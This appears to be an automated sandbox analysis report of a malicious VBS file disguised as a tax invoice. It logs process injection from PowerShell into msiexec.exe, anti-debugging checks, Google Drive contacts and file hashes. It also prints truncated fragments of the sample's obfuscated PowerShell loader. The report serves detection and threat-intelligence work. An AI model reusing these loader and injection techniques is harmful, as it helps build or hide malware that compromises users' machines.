Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2778451648.00000000088EE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2778199563.0000000008060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2759953043.0000000005324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tysklandskortene)$global:hyperdelicacy = [System.Text.Encoding]::ASCII.GetString($Afvises)$global:Esthesiography=$hyperdelicacy.substring($hanerne,$Whitewashes)<#Effulgent Precalcula
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Dilemmaet $uddrivning $Noget218), (Sumass @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:binrformens = [AppDomain]::CurrentDomain.GetAssemblies()$global:O
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Noninhabitancies)), $Frerhusene).DefineDynamicModule($Erythrodextrin, $false).DefineType($Slutakkorder, $grnsetilfldes, [System.Multic
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tysklandskortene)$global:hyperdelicacy = [System.Text.Encoding]::ASCII.GetString($Afvises)$global:Esthesiography=$hyperdelicacy.substring($hanerne,$Whitewashes)<#Effulgent Precalcula

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF84860CFE8 push esp; retf	2_2_00007FF84860CFE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF8486000BD pushad ; iretd	2_2_00007FF8486000C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_029F8D2F push 2B6C708Bh; retf	4_2_029F94F5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_029F8D70 push 2B6C708Bh; retf	4_2_029F94F5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0878181D push ebx; retf	4_2_08781823
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_087848A9 pushfd ; iretd	4_2_087848BC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_087829F5 push ebx; ret	4_2_08782A53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08782A05 push ebx; ret	4_2_08782A53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08782CF1 push ebx; iretd	4_2_08782CF2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08780F4D push esp; ret	4_2_08780F4E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08783243 push ebx; iretd	4_2_0878325E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0878423E pushfd ; iretd	4_2_08784240
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08781229 push ebx; iretd	4_2_0878122A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08780379 push ebx; retf	4_2_0878037A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0878439E push edx; iretd	4_2_087843A4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08783471 push ebx; iretd	4_2_08783472
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0878242E push ss; ret	4_2_0878242F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0878054D push ebx; retf	4_2_0878054E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_087805FA push edx; retf	4_2_087805FB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08780586 push es; iretd	4_2_08780587
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C729F5 push ebx; ret	8_2_03C72A53
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C705FA push edx; retf	8_2_03C705FB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C70586 push es; iretd	8_2_03C70587
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C7439E push edx; iretd	8_2_03C743A4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C7054D push ebx; retf	8_2_03C7054E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C70F4D push esp; ret	8_2_03C70F4E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C70379 push ebx; retf	8_2_03C7037A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C72CF1 push ebx; iretd	8_2_03C72CF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C748A9 pushfd ; iretd	8_2_03C748BC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C73243 push ebx; iretd	8_2_03C7325E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_03C73471 push ebx; iretd	8_2_03C73472

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5130	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4797	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7675	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2009	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2316	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior

Source: powershell.exe, 00000002.00000002.2381445256.000001D36D630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: Yara match	File source: amsi64_1788.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C70000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 27DF97C			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.16.206	unknown	United States	15169	GOOGLEUS	false
172.217.18.14	drive.google.com	United States	15169	GOOGLEUS	false
142.250.186.33	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

Windows Analysis Report NTS_eTaxInvoice.html.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
NTS_eTaxInvoice.html.vbs

Malware Threat Intel
Provided by

Name	IP	Active
drive.google.com	172.217.18.14	true
drive.usercontent.google.com	142.250.186.33	true

ID:	1522515
Product:	CloudBasic
Start time:	09:56:09
Start date:	30.09.2024
Sample:	NTS_eTaxInvoice.html.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a1aeb49d80b16158b4b88efef30be753
SHA1:	a7829f01f6a679b9016c1b192431a317827045b1
SHA256:	adae16c4fe643a3093a6e2ac5329616ccc62d71725f208203869d90f08b3c6d1
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	3EBBEC2F920D055DAC842B4FF84448FA	52D2AD86C481FAED6187FC7E6655C5BD646CA663	32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cusozop1.h1r.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_farvirze.w5m.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5dhknl5.0j1.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmegujnc.51n.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Forsvarsundtagelsen.Non	ASCII text, with very long lines (65536), with no line terminators	0F0C12D345508D8F65C3A877C4E3E3EC	502F251AA8F322F6F7188C83893F1B3BC2E38676	718B2422AA646CF870C7BF057A9B5D753CB2C6C12EE94C1246B425C9EB61BD5B